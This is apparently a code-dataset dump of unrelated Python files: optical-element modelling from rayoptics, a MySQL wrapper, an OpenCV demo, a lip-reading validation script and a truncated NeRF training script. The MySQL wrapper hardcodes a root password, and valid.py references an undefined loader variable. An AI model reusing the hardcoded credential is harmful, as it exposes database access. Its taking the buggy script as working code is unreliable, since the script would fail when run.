sync_to_update(self, seq_model):\n self.s_indx = seq_model.ifcs.index(self.s)\n\n def update_size(self):\n self.edge_extent = self.s.get_y_aperture_extent()\n self.sd = self.s.surface_od()\n return self.sd\n\n def extent(self):\n if hasattr(self, 'edge_extent'):\n return self.edge_extent\n else:\n self.edge_extent = self.s.get_y_aperture_extent()\n return self.edge_extent\n\n def render_shape(self):\n poly = self.s.full_profile(self.extent(), self.flat)\n poly2 = self.s.full_profile(self.extent(), self.flat, -1)\n\n thi = self.get_thi()\n offset = thi*self.z_dir\n\n for p in poly2:\n p[0] += offset\n poly += poly2\n poly.append(poly[0])\n return poly\n\n def render_handles(self, opt_model):\n self.handles = {}\n ifcs_gbl_tfrms = opt_model.seq_model.gbl_tfrms\n\n self.handles['shape'] = GraphicsHandle(self.render_shape(), self.tfrm,\n 'polygon')\n\n poly = self.s.full_profile(self.extent(), None)\n self.handles['s_profile'] = GraphicsHandle(poly,\n ifcs_gbl_tfrms[self.s_indx],\n 'polyline')\n\n thi = self.get_thi()\n offset = thi*self.z_dir\n\n poly_sd_upr = []\n poly_sd_upr.append(poly[-1])\n poly_sd_upr.append([poly[-1][0]+offset, poly[-1][1]])\n self.handles['sd_upr'] = GraphicsHandle(poly_sd_upr, self.tfrm,\n 'polyline')\n\n poly_sd_lwr = []\n poly_sd_lwr.append(poly[0])\n poly_sd_lwr.append([poly[0][0]+offset, poly[0][1]])\n self.handles['sd_lwr'] = GraphicsHandle(poly_sd_lwr, self.tfrm,\n 'polyline')\n\n return self.handles\n\n def handle_actions(self):\n self.actions = {}\n\n shape_actions = {}\n shape_actions['pt'] = SagAction(self.s)\n self.actions['shape'] = shape_actions\n\n s_prof_actions = {}\n s_prof_actions['pt'] = SagAction(self.s)\n self.actions['s_profile'] = s_prof_actions\n\n sd_upr_action = {}\n sd_upr_action['y'] = AttrAction(self, 'edge_extent[1]')\n self.actions['sd_upr'] = sd_upr_action\n\n sd_lwr_action = {}\n sd_lwr_action['y'] = AttrAction(self, 'edge_extent[0]')\n self.actions['sd_lwr'] = sd_lwr_action\n\n return self.actions\n\n\nclass ThinElement():\n\n label_format = 'TL{}'\n\n def __init__(self, ifc, tfrm=None, idx=0, sd=None, label='ThinLens'):\n self.label = label\n self.render_color = (192, 192, 192)\n if tfrm is not None:\n self.tfrm = tfrm\n else:\n self.tfrm = (np.identity(3), np.array([0., 0., 0.]))\n self.intrfc = ifc\n self.intrfc_indx = idx\n self.medium_name = 'Thin Element'\n if sd is not None:\n self.sd = sd\n else:\n self.sd = ifc.max_aperture\n self.handles = {}\n self.actions = {}\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['parent']\n del attrs['tfrm']\n del attrs['intrfc']\n del attrs['handles']\n del attrs['actions']\n return attrs\n\n def __str__(self):\n return str(self.intrfc)\n\n def sync_to_restore(self, ele_model, surfs, gaps, tfrms):\n self.parent = ele_model\n self.tfrm = tfrms[self.intrfc_indx]\n self.intrfc = surfs[self.intrfc_indx]\n if not hasattr(self, 'medium_name'):\n self.medium_name = 'Thin Element'\n\n def reference_interface(self):\n return self.intrfc\n\n def reference_idx(self):\n return self.intrfc_indx\n\n def interface_list(self):\n return [self.intrfc]\n\n def gap_list(self):\n return []\n\n def sync_to_update(self, seq_model):\n self.intrfc_indx = seq_model.ifcs.index(self.intrfc)\n\n def update_size(self):\n self.sd = self.intrfc.surface_od()\n return self.sd\n\n def render_shape(self):\n poly = self.intrfc.full_profile((-self.sd, self.sd))\n return poly\n\n def render_handles(self, opt_model):\n self.handles = {}\n shape = self.render_shape()\n self.handles['shape'] = GraphicsHandle(shape, self.tfrm, 'polygon')\n return self.handles\n\n def handle_actions(self):\n self.actions = {}\n return self.actions\n\n\nclass DummyInterface():\n\n label_format = 'D{}'\n\n def __init__(self, ifc, idx=0, sd=None, tfrm=None, label='DummyInterface'):\n self.label = label\n self.render_color = (192, 192, 192)\n if tfrm is not None:\n self.tfrm = tfrm\n else:\n self.tfrm = (np.identity(3), np.array([0., 0., 0.]))\n self.ref_ifc = ifc\n self.idx = idx\n self.medium_name = 'Interface'\n if sd is not None:\n self.sd = sd\n else:\n self.sd = ifc.max_aperture\n self.handles = {}\n self.actions = {}\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['parent']\n del attrs['tfrm']\n del attrs['ref_ifc']\n del attrs['handles']\n del attrs['actions']\n return attrs\n\n def __str__(self):\n return str(self.ref_ifc)\n\n def sync_to_restore(self, ele_model, surfs, gaps, tfrms):\n self.parent = ele_model\n self.tfrm = tfrms[self.idx]\n self.ref_ifc = surfs[self.idx]\n if not hasattr(self, 'medium_name'):\n self.medium_name = 'Interface'\n\n def reference_interface(self):\n return self.ref_ifc\n\n def reference_idx(self):\n return self.idx\n\n def interface_list(self):\n return [self.ref_ifc]\n\n def gap_list(self):\n return []\n\n def sync_to_update(self, seq_model):\n self.idx = seq_model.ifcs.index(self.ref_ifc)\n\n def update_size(self):\n self.sd = self.ref_ifc.surface_od()\n return self.sd\n\n def render_shape(self):\n poly = self.ref_ifc.full_profile((-self.sd, self.sd))\n return poly\n\n def render_handles(self, opt_model):\n self.handles = {}\n\n self.handles['shape'] = GraphicsHandle(self.render_shape(), self.tfrm,\n 'polyline')\n\n return self.handles\n\n def handle_actions(self):\n self.actions = {}\n\n def get_adj_spaces():\n seq_model = self.parent.opt_model.seq_model\n if self.idx > 0:\n before = seq_model.gaps[self.idx-1].thi\n else:\n before = None\n if self.idx < seq_model.get_num_surfaces() - 1:\n after = seq_model.gaps[self.idx].thi\n else:\n after = None\n return (before, after)\n\n def set_adj_spaces(cur_value, change):\n seq_model = self.parent.opt_model.seq_model\n if cur_value[0] is not None:\n seq_model.gaps[self.idx-1].thi = cur_value[0] + change\n if cur_value[1] is not None:\n seq_model.gaps[self.idx].thi = cur_value[1] - change\n\n slide_action = {}\n slide_action['x'] = Action(get_adj_spaces, set_adj_spaces)\n self.actions['shape'] = slide_action\n\n return self.actions\n\n\nclass AirGap():\n\n label_format = 'AirGap {}'\n\n def __init__(self, g, ref_ifc, idx=0, tfrm=None, label='AirGap'):\n if tfrm is not None:\n self.tfrm = tfrm\n else:\n self.tfrm = (np.identity(3), np.array([0., 0., 0.]))\n self.label = label\n self.render_color = (237, 243, 254, 64) # light blue\n self.gap = g\n self.medium_name = self.gap.medium.name()\n self.ref_ifc = ref_ifc\n self.idx = idx\n self.handles = {}\n self.actions = {}\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['parent']\n del attrs['tfrm']\n del attrs['gap']\n del attrs['ref_ifc']\n del attrs['handles']\n del attrs['actions']\n return attrs\n\n def __str__(self):\n return str(self.gap)\n\n def sync_to_restore(self, ele_model, surfs, gaps, tfrms):\n self.parent = ele_model\n self.gap = gaps[self.idx]\n self.ref_ifc = surfs[self.idx]\n self.tfrm = tfrms[self.idx]\n if not hasattr(self, 'render_color'):\n self.render_color = (237, 243, 254, 64) # light blue\n if not hasattr(self, 'medium_name'):\n self.medium_name = self.gap.medium.name()\n\n def reference_interface(self):\n return self.ref_ifc\n\n def reference_idx(self):\n return self.idx\n\n def interface_list(self):\n return []\n\n def gap_list(self):\n return [self.gap]\n\n def sync_to_update(self, seq_model):\n self.idx = seq_model.gaps.index(self.gap)\n\n def update_size(self):\n pass\n\n def render_handles(self, opt_model):\n self.handles = {}\n\n poly_ct = []\n poly_ct.append([0., 0.])\n poly_ct.append([self.gap.thi, 0.])\n\n # Modify the tfrm to account for any decenters following\n # the reference ifc.\n tfrm = self.tfrm\n if self.ref_ifc.decenter is not None:\n d = self.ref_ifc.decenter\n r_global, t_global = tfrm\n r_after_ifc, t_after_ifc = d.tform_after_surf()\n t = r_global.dot(t_after_ifc) + t_global\n r = r_global if r_after_ifc is None else r_global.dot(r_after_ifc)\n tfrm = r, t\n\n self.handles['ct'] = GraphicsHandle(poly_ct, tfrm, 'polyline')\n\n return self.handles\n\n def handle_actions(self):\n self.actions = {}\n\n ct_action = {}\n ct_action['x'] = AttrAction(self.gap, 'thi')\n self.actions['ct'] = ct_action\n\n return self.actions\n\n\nclass ElementModel:\n\n def __init__(self, opt_model):\n self.opt_model = opt_model\n self.elements = []\n self.ifcs_dict = {}\n self.gap_dict = {}\n\n def reset(self):\n self.__init__()\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['opt_model']\n del attrs['ifcs_dict']\n del attrs['gap_dict']\n return attrs\n\n def sync_to_restore(self, opt_model):\n self.opt_model = opt_model\n seq_model = opt_model.seq_model\n surfs = seq_model.ifcs\n gaps = seq_model.gaps\n tfrms = seq_model.compute_global_coords(1)\n\n self.ifcs_dict = {}\n self.gap_dict = {}\n\n # special processing for older models\n self.airgaps_from_sequence(seq_model, tfrms)\n self.add_dummy_interface_at_image(seq_model, tfrms)\n\n for i, e in enumerate(self.elements):\n e.sync_to_restore(self, surfs, gaps, tfrms)\n for ifc in e.interface_list():\n self.ifcs_dict[ifc] = e\n for g in e.gap_list():\n self.gap_dict[g] = e\n if not hasattr(e, 'label'):\n e.label = e.label_format.format(i+1)\n self.sequence_elements()\n self.relabel_airgaps()\n# self.list_elements()\n\n def elements_from_sequence(self, seq_model):\n \"\"\" generate an element list from a sequential model \"\"\"\n\n # if there are elements in the list already, just return\n if len(self.elements) > 0:\n return\n\n num_elements = 0\n tfrms = seq_model.compute_global_coords(1)\n for i, g in enumerate(seq_model.gaps):\n s1 = seq_model.ifcs[i]\n tfrm = tfrms[i]\n if g.medium.name().lower() == 'air':\n if i > 0:\n self.process_airgap(seq_model, i, g, s1, tfrm,\n num_elements, add_ele=True)\n else: # a non-air medium\n # handle buried mirror, e.g. prism or Mangin mirror\n if s1.interact_mode == 'reflect':\n gp = seq_model.gaps[i-1]\n if gp.medium.name().lower() == g.medium.name().lower():\n continue\n\n s2 = seq_model.ifcs[i+1]\n sd = max(s1.surface_od(), s2.surface_od())\n e = Element(s1, s2, g, sd=sd, tfrm=tfrm, idx=i, idx2=i+1)\n num_elements += 1\n e.label = Element.label_format.format(num_elements)\n self.add_element(e)\n\n self.add_dummy_interface_at_image(seq_model, tfrms)\n\n self.relabel_airgaps()\n\n def process_airgap(self, seq_model, i, g, s, tfrm, num_ele, add_ele=True):\n if s.interact_mode == 'reflect' and add_ele:\n sd = s.surface_od()\n z_dir = seq_model.z_dir[i]\n m = Mirror(s, sd=sd, tfrm=tfrm, idx=i, z_dir=z_dir)\n num_ele += 1\n m.label = Mirror.label_format.format(num_ele)\n self.add_element(m)\n elif s.interact_mode == 'transmit':\n add_dummy = False\n if i == 0:\n add_dummy = True # add dummy for the object\n dummy_label = 'Object'\n else: # i > 0\n gp = seq_model.gaps[i-1]\n if gp.medium.name().lower() == 'air':\n add_dummy = True\n if seq_model.stop_surface == i:\n dummy_label = 'Aperture Stop'\n else:\n dummy_label = DummyInterface.label_format.format(i)\n if add_dummy:\n tfrm = tfrm\n sd = s.surface_od()\n di = DummyInterface(s, sd=sd, tfrm=tfrm, idx=i)\n di.label = dummy_label\n self.add_element(di)\n elif isinstance(s, thinlens.ThinLens) and add_ele:\n te = ThinElement(s, tfrm=tfrm, idx=i)\n num_ele += 1\n te.label = ThinElement.label_format.format(num_ele)\n self.add_element(te)\n\n # add an AirGap\n ag = AirGap(g, s, idx=i, tfrm=tfrm)\n self.add_element(ag)\n\n def airgaps_from_sequence(self, seq_model, tfrms):\n \"\"\" add airgaps and dummy interfaces to an older version model \"\"\"\n for e in self.elements:\n if isinstance(e, AirGap):\n return # found an AirGap, model probably OK\n\n num_elements = 0\n seq_model = self.opt_model.seq_model\n for i, g in enumerate(seq_model.gaps):\n if g.medium.name().lower() == 'air':\n if i > 0:\n s = seq_model.ifcs[i]\n tfrm = tfrms[i]\n self.process_airgap(seq_model, i, g, s, tfrm,\n num_elements, add_ele=False)\n\n def add_dummy_interface_at_image(self, seq_model, tfrms):\n if len(self.elements) and self.elements[-1].label == 'Image':\n return\n\n s = seq_model.ifcs[-1]\n idx = seq_model.get_num_surfaces() - 1\n di = DummyInterface(s, sd=s.surface_od(), tfrm=tfrms[-1], idx=idx)\n di.label = 'Image'\n self.add_element(di)\n\n def update_model(self):\n seq_model = self.opt_model.seq_model\n tfrms = seq_model.compute_global_coords(1)\n for e in self.elements:\n e.update_size()\n e.sync_to_update(seq_model)\n intrfc = e.reference_interface()\n try:\n i = seq_model.ifcs.index(intrfc)\n except ValueError:\n print(\"Interface {} not found\".format(intrfc.lbl))\n else:\n e.tfrm = tfrms[i]\n self.sequence_elements()\n\n def sequence_elements(self):\n \"\"\" Sort elements in order of reference interfaces in seq_model \"\"\"\n seq_model = self.opt_model.seq_model\n self.elements.sort(key=lambda e:\n seq_model.ifcs.index(e.reference_interface()))\n\n def relabel_airgaps(self):\n for i, e in enumerate(self.elements):\n if isinstance(e, AirGap):\n eb = self.elements[i-1].label\n ea = self.elements[i+1].label\n e.label = AirGap.label_format.format(eb + '-' + ea)\n\n def add_element(self, e):\n e.parent = self\n self.elements.append(e)\n for ifc in e.interface_list():\n self.ifcs_dict[ifc] = e\n for g in e.gap_list():\n self.gap_dict[g] = e\n\n def remove_element(self, e):\n for ifc in e.interface_list():\n self.ifcs_dict.pop(ifc)\n for g in e.gap_list():\n self.gap_dict.pop(g)\n e.parent = None\n self.elements.remove(e)\n\n def get_num_elements(self):\n return len(self.elements)\n\n def list_elements(self):\n for i, ele in enumerate(self.elements):\n print(\"%d: %s (%s): %s\" %\n (i, ele.label, type(ele).__name__, ele))\n\n def element_type(self, i):\n return type(self.elements[i]).__name__\n","sub_path":"src/rayoptics/optical/elements.py","file_name":"elements.py","file_ext":"py","file_size_in_byte":29291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"441830585","text":"from mysql import connector\n\n\nclass Database:\n \"\"\"\n Database class is used to create a object which can connect to mySQL database\n and handle with this database.\n When you initialize a object of Database class, you have to transfer a kawargs\n contains host, user, password, port, database.\n \"\"\"\n def __init__(self, **kwargs):\n self.__host = kwargs['host']\n self.__user = kwargs['user']\n self.__password = kwargs['password']\n self.__port = kwargs['port']\n self.__database = kwargs['database']\n \n self.__connect_database()\n\n def __connect_database(self):\n \"\"\"\n __connect_database function is used to connect to your mySQL Database.\n \"\"\"\n try:\n self.conn = connector.connect(host=self.__host,\n user=self.__user,\n password=self.__password,\n port=self.__port,\n database=self.__database)\n self.my_cursor = self.conn.cursor(buffered=True)\n except:\n print(\"Can't connect database !!!\")\n\n def get_all(self, sql: str):\n \"\"\"\n get all record from table database\n input: sql query\n return: an array if get success\n \"\"\"\n try:\n self.my_cursor.execute(sql)\n data = self.my_cursor.fetchall()\n return data\n except:\n print(\"Can't get data !!!\")\n\n def get_item(self, sql: str, *params):\n \"\"\"\n get the first record which fit with condition\n input: sql query: string, params: tuple contain the conditions\n return: a record tuple if success\n \"\"\"\n try:\n self.my_cursor.execute(sql, params)\n data = self.my_cursor.fetchone()\n return data\n except:\n print(\"Can't get data !!!\")\n\n def insert_item(self, sql: str, *args):\n \"\"\"\n insert a new record into your table database.\n input: sql query: string, an args contain fields: tuple\n \"\"\"\n try:\n self.my_cursor.execute(sql, args)\n self.conn.commit()\n except:\n print(\"Can't Insert !!!\")\n\n def insert_list(self, sql: str, items):\n \"\"\"\n insert a new record list into your table database.\n input: sql query: string, items: a list tuple contain the records\n \"\"\"\n try:\n self.my_cursor.executemany(sql, items)\n self.conn.commit()\n except:\n print(\"Can't Insert !!!\")\n\n def update(self, sql: str, *args):\n \"\"\"\n update a specifically record by old_name in your table database.\n input: sql query: string, a tuple contain the fields\n \"\"\"\n try:\n self.my_cursor.execute(sql, args)\n self.conn.commit()\n except:\n print(\"Can't update!!!\")\n\n def delete(self, sql: str, *params):\n \"\"\"\n delete a record in your table database by the name record.\n input: sql query: string, params: tuple contain the conditions\n \"\"\"\n try:\n self.my_cursor.execute(sql, params)\n self.conn.commit()\n except:\n print(\"Can't delete !!!\")\n\nmy_db = Database(host='localhost',\n user='root',\n password='ductai2207',\n port='3307',\n database='bap_ai')\n#\n# sql = \"SELECT * FROM customers WHERE name=%s\"\n# # print(my_db._get_all())\n# name =(\"eee\",)\n# print(my_db._get_item(sql, *name))\n#\n# #\n# def testInsert():\n# sql = \"INSERT INTO customers(name, address, age) VALUES (%s, %s, %s)\"\n# # new_name = input(\"Enter new name: \")\n# # new_address = input(\"Enter new address: \")\n# # age = int(input(\"Enter age: \"))\n# # params = (new_name, new_address, age)\n# params = ('ooo', '0', 12)\n# my_db._insert_item(sql, *params)\n#\n# def testUpdate():\n# sql = \"UPDATE customers SET name=%s, address=%s, age=%s WHERE name=%s\"\n# old_name = input(\"Enter customer's name need to update: \")\n# new_name = input(\"Enter new name: \")\n# new_address = input(\"Enter new address: \")\n# age = int(input(\"Enter age: \"))\n# params = (new_name, new_address, age, old_name)\n# my_db._update(sql, *params)\n#\n# def testDelete():\n# sql = \"DELETE FROM customers WHERE name=%s\"\n# # name = input(\"Enter customer's name need to delete: \")\n# # tuple(name)\n# name = (\"ohh\",)\n# my_db._delete(sql, *name)\n\n# testUpdate()\n# testInsert()\n# testDelete()\n\n# items = [('You', 'ngo quyen', 23), ('Hoc', 'ngo si lien', 20)]\n# my_db._insert_list(items)\n\n","sub_path":"Database_exercise/connect_db.py","file_name":"connect_db.py","file_ext":"py","file_size_in_byte":4786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"3201255","text":"# ch34_3.py\nimport cv2\ncv2.namedWindow(\"MyPicture\") # 使用預設\nimg = cv2.imread(\"antarctica3.jpg\") # 彩色讀取\ncv2.line(img,(100,100),(1200,100),(255,0,0),2) # 輸出線條\ncv2.rectangle(img,(100,200),(1200,400),(0,0,255),2) # 輸出矩陣\ncv2.putText(img,\"I Like Python\",(400,350), # 輸出文字\n cv2.FONT_ITALIC,3,(255,0,0),8)\ncv2.imshow(\"MyPicture\", img) # 顯示影像img\ncv2.waitKey(3000) # 等待3秒\ncv2.destroyAllWindows() # 刪除所有視窗\n\n\n\n\n\n\n \n","sub_path":"pratice/範例檔案/ch34/ch34_3.py","file_name":"ch34_3.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"441096930","text":"import torch\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom LipReadDataTest import ReadData\nimport opt\n\n\n\ndef valid(model, epoch):\n test_dataset = ReadData(opt.test_image_file, seq_max_lens=24)\n test_data_loader = DataLoader(test_dataset, batch_size=opt.num_workers, shuffle=True, num_workers=opt.num_workers, drop_last=False)\n n_samples = len(test_data_loader.dataset)\n\n # GPU\n device = torch.device('cuda:0')\n # # CPU\n # device = torch.device('cpu')\n model.eval()\n\n with torch.no_grad():\n running_corrects = 0.\n\n for i_batch, sample_batched in enumerate(dataloader):\n\n input_data = Variable(sample_batched['volume']).to(device)\n labels = Variable(sample_batched['label']).long().to(device)\n length = Variable(sample_batched['length']).to(device)\n\n outputs = model(input_data)\n\n batch_correct = validator(outputs, length, labels, every_frame=False)\n running_corrects += batch_correct\n\n acc = float(running_corrects) / n_samples\n print(f'Epoch:\\t{epoch}\\tAcc:{acc}\\n')\n return acc\n\n\ndef validator(modelOutput, length, labels, every_frame=False):\n labels = labels.cpu()\n averageEnergies = torch.zeros((modelOutput.size(0), modelOutput.size(-1)))\n for i in range(modelOutput.size(0)):\n if every_frame:\n averageEnergies[i] = torch.mean(modelOutput[i, :length[i]], 0)\n else:\n averageEnergies[i] = modelOutput[i, length[i] - 1]\n\n _, maxindices = torch.max(averageEnergies, 1)\n count = torch.sum(maxindices == labels)\n return count\n\n","sub_path":"valid.py","file_name":"valid.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"373822300","text":"import argparse\nimport json\nimport copy\nimport torch\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom models.weight_generator import WeightGenerator, add_weight_res\nfrom models.nerf import build_nerf, set_grad\nfrom models.rendering import get_rays_shapenet, sample_points, volume_render\nfrom datasets.shapenetV2 import build_shapenetV2\nimport wandb\nfrom weight_gen_test import test\nfrom rich import print\nfrom rich import pretty\npretty.install()\nfrom rich import traceback\ntraceback.install()\nfrom utils.shape_video import create_360_video\nfrom pathlib import Path\nfrom torchvision.utils import make_grid\nimport torch.nn as nn\nimport numpy as np\nimport random\nSEED=42\ntorch.manual_seed(SEED)\nrandom.seed(SEED)\nnp.random.seed(SEED)\nimport lpips\nimport pytorch_ssim\nimport logging\nimport hydra\nfrom omegaconf import DictConfig\nfrom hydra.core.hydra_config import HydraConfig\nimport os\n\ndef make_img_idx(available_views, num_views, num_runs):\n idx_list = []\n finished = 0\n idxs = list(range(available_views))\n while finished < num_runs:\n i = np.random.choice(idxs, size=num_views)\n i.sort()\n # if i not in idx_list:\n if len(np.where((idx_list == i))[0]) == 0:\n idx_list.append(i)\n finished +=1\n return idx_list\n\n\ndef split_at_idx(t, idx=[0]):\n\n\n t1 = []\n t2 = []\n b = t.size()[0]\n for i in range(b):\n if i in idx:\n t1.append(t[i])\n else:\n t2.append(t[i])\n\n t1 = torch.stack(t1, dim=0)\n t2 = torch.stack(t2, dim=0)\n return t1, t2\n\ndef inner_loop(args, nerf_model, nerf_optim, pixels, imgs, rays_o, rays_d,\n poses, bound, hwf, num_samples, raybatch_size, inner_steps,\n device, idx, log_round=False, setup=\"train/\", input_idx=[0]):\n \"\"\"\n train the inner model for a specified number of iterations\n \"\"\"\n num_rays = rays_d.shape[0]\n logs = dict()\n for i in range(1, inner_steps+1):\n if log_round and ((i % args.nerf.tto_log_steps == 0) or (i == inner_steps) or (i==1)):\n with torch.no_grad():\n scene_psnr, scene_lpips_alex, scene_lpips_vgg, scene_ssims =\\\n 0, 0, 0, 0\n scene_psnr, scene_lpips_alex, scene_lpips_vgg, scene_ssims\\\n = report_result(nerf_model, imgs,\n poses, hwf,\n bound, num_samples, raybatch_size)\n vid_save_path = os.path.join(cwd, \"video\")\n vid_frames = create_360_video(args.nerf, nerf_model, hwf, bound,\n device,\n idx, vid_save_path)\n\n if \"train\" in setup:\n logs[setup + \"SSIM tto_step=\" + str(i)] = scene_ssims\n logs[setup + \"LPIPS_vgg tto_step=\" + str(i)] = scene_lpips_vgg\n logs[setup + \"LPIPS_alexnet tto_step=\" + str(i)] = scene_lpips_alex\n logs[setup + \"scene_psnr tto_step=\" + str(i)] = scene_psnr\n logs[setup + \"vid_post tto_step=\" + str(i)] = wandb.Video(\n vid_frames.transpose(0, 3, 1, 2), fps=30,\n format=\"mp4\")\n else:\n logs[setup + \"SSIM tto_step=\" + str(i)] = scene_ssims\n logs[setup + \"LPIPS_vgg tto_step=\" + str(i)] = scene_lpips_vgg\n logs[setup + \"LPIPS_alexnet tto_step=\" + str(i)] = scene_lpips_alex\n logs[setup + \"scene_psnr tto_step=\" + str(i)] = scene_psnr\n logs[setup + \"vid_post input_idx=\" + str(input_idx) + \" tto_step=\" + str(i)] = wandb.Video(\n vid_frames.transpose(0, 3, 1, 2), fps=30,\n format=\"mp4\")\n\n indices = torch.randint(num_rays, size=[raybatch_size])\n raybatch_o, raybatch_d = rays_o[indices], rays_d[indices]\n pixelbatch = pixels[indices] \n t_vals, xyz = sample_points(raybatch_o, raybatch_d, bound[0], bound[1],\n num_samples, perturb=True)\n \n\n rgbs, sigmas = nerf_model(xyz)\n colors = volume_render(rgbs, sigmas, t_vals, white_bkgd=True)\n loss = F.mse_loss(colors, pixelbatch)\n loss.backward()\n nerf_optim.step()\n nerf_optim.zero_grad()\n\n return logs, nerf_model\n\n\n\ndef train_meta(args, epoch_idx, nerf_model, gen_model, gen_optim, data_loader, device, ref_state_dict=None):\n \"\"\"\n train the meta_model for one epoch using reptile meta learning\n https://arxiv.org/abs/1803.02999\n \"\"\"\n gen_model.train()\n gen_model.requires_grad_(True)\n gen_model.feature_extractor.requires_grad_(False)\n\n\n step = (epoch_idx-1)*len(data_loader)\n train_step = (epoch_idx - 1) * len(data_loader) + 1\n psnr_accum = dict()\n ssim_accum = dict()\n lpips_alex_accum = dict()\n lpips_vgg_accum = dict()\n\n avg_psnr = 0\n avg_ssim = 0\n avg_lpips_alex = 0\n avg_lpips_vgg = 0\n for idx, batch in enumerate(data_loader):\n log_round=(step % args.log_interval == 0)\n\n imgs = batch[\"imgs\"]\n poses = batch[\"poses\"]\n hwf = batch[\"hwf\"]\n bound = batch[\"bound\"]\n relative_poses = batch[\"relative_poses\"]\n\n imgs, poses, hwf, bound, relative_poses = imgs.to(device), poses.to(device), hwf.to(device), bound.to(device), relative_poses.to(device)\n imgs, poses, hwf, bound, relative_poses = imgs.squeeze(), poses.squeeze(), hwf.squeeze(), bound.squeeze(), relative_poses.squeeze()\n rays_o, rays_d = get_rays_shapenet(hwf, poses)\n rays_o, rays_d = rays_o.reshape(-1, 3), rays_d.reshape(-1, 3)\n num_rays = rays_d.shape[0]\n pixels = imgs.reshape(-1, 3)\n\n # Train weight generator\n nerf_model_copy = copy.deepcopy(nerf_model) #! copy meta model initialized weights\n weight_res = gen_model(imgs, relative_poses, bound)\n\n nerf_model_copy, logs_weight_stat = \\\n add_weight_res(nerf_model_copy, weight_res, log_round=log_round,\n setup=\"train/\", std_scale=args.feat.std_scale, hidden_layers=args.nerf.nerf_hidden_layers)\n indices = torch.randint(num_rays, size=[args.nerf.train_batchsize])\n raybatch_o, raybatch_d = rays_o[indices], rays_d[indices]\n pixelbatch = pixels[indices]\n t_vals, xyz = sample_points(raybatch_o, raybatch_d, bound[0], bound[1],\n args.nerf.num_samples, perturb=True)\n\n rgbs, sigmas = nerf_model_copy(xyz)\n colors = volume_render(rgbs, sigmas, t_vals, white_bkgd=True)\n\n loss = F.mse_loss(colors, pixelbatch)\n # loss.backward()\n # gen_optim.step()\n # gen_optim.zero_grad()\n\n #! this block causes problem when trying to do reptile loss since\n #! weight assignment is an in-place operation\n inner_nerf_model_copy = copy.deepcopy(nerf_model)\n for i in range(len(nerf_model_copy.net)):\n if hasattr(nerf_model_copy.net[i], \"weight\"):\n layer = nerf_model_copy.net[i].weight.clone()\n layer.grad=None\n inner_nerf_model_copy.net[i].weight = nn.Parameter(layer)\n\n inner_nerf_model_copy = set_grad(inner_nerf_model_copy, True)\n inner_nerf_model_copy.train()\n nerf_optim = torch.optim.SGD(inner_nerf_model_copy.parameters(), args.nerf.inner_lr)\n\n logs, tto_nerf_model = inner_loop(args, inner_nerf_model_copy, nerf_optim, pixels, imgs,\n rays_o, rays_d, poses, bound, hwf, args.nerf.num_samples,\n args.nerf.train_batchsize, args.nerf.inner_steps,\n device=device, idx=idx, log_round=log_round, setup=\"train/\")\n\n if args.feat.use_reptile_loss:\n gt_res = []\n for i in range(args.nerf_hidden_layers):\n l = i * 2 + 1\n gt_res.append(torch.flatten(tto_nerf_model.net[l].weight.data - nerf_model.net[l].weight.data))\n gt_res = torch.cat(gt_res).detach().requires_grad_(True)\n gt_res.grad=None\n reptile_loss= F.mse_loss(gt_res, weight_res)*args.feat.reptile_loss_weight\n loss += reptile_loss\n\n loss.backward()\n gen_optim.step()\n gen_optim.zero_grad()\n\n if log_round:\n if args.feat.use_reptile_loss:\n logs[\"reptile_loss\"] = reptile_loss\n avg_psnr += logs[\"train/scene_psnr tto_step=\" + str(args.nerf.inner_steps)]\n avg_lpips_alex += logs[\"train/LPIPS_alexnet tto_step=\"+ str(args.nerf.inner_steps)]\n avg_lpips_vgg += logs[\"train/LPIPS_vgg tto_step=\"+ str(args.nerf.inner_steps)]\n avg_ssim += logs[\"train/SSIM tto_step=\"+ str(args.nerf.inner_steps)]\n\n logs[\"train/gen_model_mse_loss\"] = float(loss)\n logs = {**logs, **logs_weight_stat, \"train_step\": train_step,\n \"train/imgs\":wandb.Image(make_grid(imgs.permute(0, 3, 1, 2)))}\n wandb.log(logs)\n\n for (key, val) in logs.items():\n if \"psnr\" in key:\n if psnr_accum.get(key) is None:\n psnr_accum[key] = 0\n psnr_accum[key] += val\n\n if \"LPIPS_vgg\" in key:\n if lpips_vgg_accum.get(key) is None:\n lpips_vgg_accum[key] = 0\n lpips_vgg_accum[key] += val\n\n if \"LPIPS_alexnet\" in key:\n if lpips_alex_accum.get(key) is None:\n lpips_alex_accum[key] = 0\n lpips_alex_accum[key] += val\n\n if \"SSIM\" in key:\n if ssim_accum.get(key) is None:\n ssim_accum[key] = 0\n ssim_accum[key] += val\n step+=1\n psnr_mean = dict()\n ssim_mean = dict()\n lpips_alex_mean = dict()\n lpips_vgg_mean = dict()\n\n for (key, val) in psnr_accum.items():\n psnr_mean[key + \"_mean\"] = val / len(data_loader)\n for (key, val) in lpips_alex_accum.items():\n lpips_alex_mean[key + \"_mean\"] = val / len(data_loader)\n for (key, val) in lpips_vgg_accum.items():\n lpips_vgg_mean[key + \"_mean\"] = val / len(data_loader)\n for (key, val) in ssim_accum.items():\n ssim_mean[key + \"_mean\"] = val / len(data_loader)\n\n avg_psnr /= len(data_loader)\n avg_lpips_alex /= len(data_loader)\n avg_lpips_vgg /= len(data_loader)\n avg_ssim /= len(data_loader)\n\n wandb.log({**psnr_mean, **lpips_alex_mean, **lpips_vgg_mean,\n **ssim_mean, \"train/PSNR_epoch_mean\": avg_psnr,\n \"train/LPIPS_alexnet_epoch_mean\":avg_lpips_alex,\n \"train/LPIPS_vgg_epoch_mean\":avg_lpips_vgg,\n \"train/SSIM_epoch_mean\":avg_ssim})\n\ndef report_result(model, imgs, poses, hwf, bound, num_samples, raybatch_size):\n \"\"\"\n report view-synthesis result on heldout views\n \"\"\"\n ray_origins, ray_directions = 